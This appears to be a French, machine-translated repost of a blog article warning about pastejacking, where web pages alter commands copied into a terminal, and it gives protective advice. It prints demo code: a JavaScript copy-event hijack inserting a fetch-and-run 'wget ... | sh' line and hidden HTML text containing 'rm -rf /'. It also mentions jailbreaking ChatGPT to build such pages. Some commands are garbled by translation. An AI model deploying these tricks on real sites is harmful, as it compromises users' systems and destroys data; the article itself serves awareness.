Pourquoi vous ne devriez pas copier-coller les commandes depuis Internet

Publié le 30 août 2023 par Mycamer

Des ordinateurs aux téléphones portables, le copier-coller est répandu partout. Cela vous facilite la vie et vous fait gagner du temps car vous n’avez pas besoin de taper de longues commandes ou de textes redondants. Cependant, si vous n’êtes pas assez prudent, vous pouvez vous faire pirater en copiant simplement des commandes sur le terminal de votre ordinateur.

Apprenons comment le copier-coller peut vous faire pirater et ce que vous devez faire pour l’empêcher.

Pourquoi vous ne devriez pas copier-coller les commandes

Que vous soyez nouveau dans l’utilisation de la ligne de commande ou que vous soyez un vétéran chevronné, vous pourriez être tenté de copier-coller des commandes à partir d’Internet pour gagner du temps et effectuer le travail réel. Cependant, vous devez savoir que les sites malveillants utilisent en fait des boîtes de code pour injecter du code malveillant chaque fois que vous copiez-collez des commandes directement dans le terminal.

Ces acteurs malveillants utilisent diverses astuces frontales pour dissimuler des commandes malveillantes derrière un code apparemment inoffensif.

Une commande comme sudo apt-get mise à jour & apt-get mise à niveau devrait normalement mettre à jour les référentiels et mettre à niveau les packages sur un système Linux. Cependant, si vous ne le savez pas et copiez-collez cette commande directement dans votre terminal, vous pourriez sans le savoir exécuter du code malveillant avec les privilèges root en raison du sudo préfixe.

Dans le pire des cas, cela pourrait éventuellement entraîner une prise de contrôle complète de votre système, voire une attaque de ransomware. Mais comment les acteurs de la menace y parviennent-ils ? Comment des commandes malveillantes peuvent-elles être cachées derrière un code inoffensif ?

Comment fonctionnent les exploits de code malveillant

Cet exploit peut être réalisé en utilisant du JavaScript intelligemment conçu ou même du HTML de base. JavaScript possède un mécanisme appelé Écouteur d’événements. Les événements sont des actions qui peuvent se produire dans le navigateur, comme cliquer sur un bouton, soumettre un formulaire, déplacer la souris, appuyer sur une touche ou redimensionner la fenêtre.

Le Écouteur d’événements, comme son nom l’indique, permet à votre application Web de réagir à certains événements déclenchés par l’action de l’utilisateur. Les pages Web malveillantes exploitent ce mécanisme légitime et utile en capturant l’événement au cours duquel un utilisateur copie du texte et en remplaçant le texte inoffensif par un code malveillant.

Voici le principal code d’exploitation utilisé pour créer l’image de démonstration :

 <script>
document.addEventListener('copy', function(event) {
  event.preventDefault();
  const copiedText = "wget http://localhost:8000/malware.sh | sh";
  event.clipboardData.setData('text/plain', copiedText);
});
</script>

Voici une autre démo, qui ne nécessite aucun JavaScript et utilise du HTML Vanilla :

 <p>
sudo apt-get install google-chrome-stable
<span style="color:white;font-size:0pt;">rm -rf /</span>

</p>

Cela crée un texte blanc invisible, masquant efficacement la commande malveillante “rm -rf /” et le
La balise crée un saut de ligne afin que certains terminaux exécutent immédiatement le code après le coller. Vous pourriez penser qu’une solide maîtrise des compétences en programmation et en développement Web est nécessaire pour mener à bien cette attaque, mais en réalité, c’est assez simple.

Même si un attaquant n’a aucune connaissance en JavaScript ou en développement Web, il peut facilement créer des logiciels malveillants à l’aide de ChatGPT. Avec les bonnes invites, on peut facilement jailbreak ChatGPT et faites-lui créer des pages Web malveillantes qui utilisent cette astuce.

Comment vous protéger

Il n’existe aucun moyen concret de vous protéger contre les attaques de code malveillant. Bien sûr, vous pouvez interdire JavaScript pour les sites suspects, mais, de par leur nature, ils ne vous permettront probablement pas de naviguer sans que JavaScript soit activé.

De plus, pour la méthode CSS (Cascading Style Sheets), il n’existe aucune défense concrète contre les commandes malveillantes puisqu’il s’agit toujours d’un code CSS valide (c’est-à-dire qu’il n’y a rien de mal à cela mais que l’intention est toujours malveillante). La meilleure façon de vous protéger serait simplement de suivre une hygiène de base sur Internet et de faire preuve de vigilance.

Ne visitez pas les liens inconnus et assurez-vous de toujours coller la commande que vous copiez depuis Internet dans un éditeur de texte avant de la coller dans le terminal. Tenez-vous-en à des ressources de code légitimes et réputées pour vous assurer que vous n’accueillez pas de code malveillant dans votre ligne de commande.

De plus, quelques terminaux, comme le terminal xfce4, sont pré-équipés d’une protection contre le copier-coller. Il affichera une fenêtre contextuelle qui vous indiquera exactement ce qui sera exécuté dès que vous collerez une commande dans votre terminal. Vérifiez si votre terminal dispose également d’un mécanisme similaire et activez-le.

L’exécution de code malveillant est très dangereuse

Même si un antivirus est installé, certaines formes d’exécution de code malveillant peuvent toujours pénétrer les barrières de protection de votre appareil. C’est pourquoi il est crucial de se méfier du code que vous copiez en ligne et de prendre des mesures de protection autant que possible pour assurer votre sécurité.

to www.makeuseof.com


Abonnez-vous à notre page Facebook: https://www.facebook.com/mycamer.net
Pour recevoir l’actualité sur vos téléphones à partir de l’application Telegram cliquez ici: https://t.me/+KMdLTc0qS6ZkMGI0
Nous ecrire par Whatsapp : Whatsapp +44 7476844931